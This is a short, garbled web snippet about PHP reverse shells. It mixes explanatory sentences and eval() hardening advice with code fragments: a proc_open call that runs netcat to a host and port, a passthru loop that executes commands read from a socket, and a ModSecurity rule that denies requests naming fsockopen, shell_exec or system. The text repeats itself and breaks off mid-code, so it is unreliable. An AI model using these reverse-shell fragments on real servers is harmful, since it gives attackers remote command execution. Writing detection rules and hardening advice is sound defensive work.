This script is extremely rudimentary and there are many ways to implement a reverse shell in PHP, but it illustrates the basic concept. Attackers often use more sophisticated and encoded/encrypted scripts to avoid detection.
$process = proc_open("nc $host $port", $descriptorspec, $pipes); Reverse Shell Php
Many obfuscated shells use eval() to decode payloads. Disable eval() via Suhosin or OpCache hardening if possible. This script is extremely rudimentary and there are
SecRule REQUEST_FILENAME "\.php$" "chain,deny,id:10001" SecRule REQUEST_BODY|ARGS "(fsockopen|pfsockopen|shell_exec|system|`.*`)" "t:lowercase" ob_get_clean() . "\n")
elseif (function_exists('passthru')) while ($cmd = fgets($sock)) ob_start(); passthru($cmd); fwrite($sock, ob_get_clean() . "\n");